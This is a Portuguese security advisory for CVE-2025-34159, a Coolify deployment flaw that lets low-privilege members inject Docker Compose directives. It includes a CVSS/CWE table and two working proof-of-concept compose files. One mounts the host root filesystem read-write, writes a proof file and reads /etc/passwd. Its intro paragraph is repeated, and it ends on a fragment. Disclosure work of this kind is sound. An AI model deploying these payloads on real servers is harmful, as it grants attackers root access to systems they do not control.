
Uma vulnerabilidade crítica de Execução Remota de Código (RCE) existe no fluxo de trabalho de implantação de aplicativos do Coolify. Essa falha permite que um membro com privilégios baixos injete diretivas arbitrárias do Docker Compose durante a criação ou atualização de projetos. Ao definir um serviço malicioso que monta o sistema de arquivos do host, um atacante pode alcançar a execução de comandos em nível de root no
| Campo | Valor |
|---|---|
| ID do CVE | CVE-2025-34159 |
| Afeta | Coolify ≤ v4.0.0-beta.420.6 |
| Corrigido em | v4.0.0-beta.420.7 |
| Gravidade | Crítica |
| CVSS 4.0 | CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| CWE | CWE-78 (Injeção de Comandos do SO), CWE-20 (Validação de Entrada Incorreta) |
Uma vulnerabilidade crítica de Execução Remota de Código (RCE) existe no fluxo de implantação de aplicações do Coolify. Esta falha permite que um membro com privilégios baixos injete diretivas arbitrárias do Docker Compose durante a criação ou atualização de projetos. Ao definir um serviço malicioso que monta o sistema de arquivos do host, um atacante pode alcançar execução de comandos a nível de root no sistema operacional do host, contornando completamente o isolamento do contêiner.
A vulnerabilidade existe no fluxo de implantação de projetos, onde as configurações de Docker Compose fornecidas pelo utilizador são processadas sem validação ou isolamento suficientes.
version: '3.8'
services:
poc-host-root:
image: alpine:3.19
tty: true
volumes:
- /:/host:rw
command: >
sh -c "
echo '[*] Proof of RCE on host' &&
echo 'RCE by Eyodav' > /host/tmp/proof_rce.txt &&
whoami &&
id &&
uname -a &&
head -n 5 /host/etc/passwd
"
Resultado: Após a implantação, /tmp/proof_rce.txt aparece no sistema host, confirmando RCE com privilégios de root.
version: '3.8'
services:
poc-host-write:
image: alpine:3.19
tty: true
volumes:
- /home/eyodav/PoC:/host
command: >
sh -c "
set -e;
mkdir -p /host &&
echo '[*] Writing PoC file to host mount...' &&
echo RCE_PoC_from_container_$(date) > /host/RCE_PoC.txt &&
cd /host &&
pwd &&
ls -la
"
/tmp/proof_rce.txt) ou revendo a saída de comandos nos logs de implantação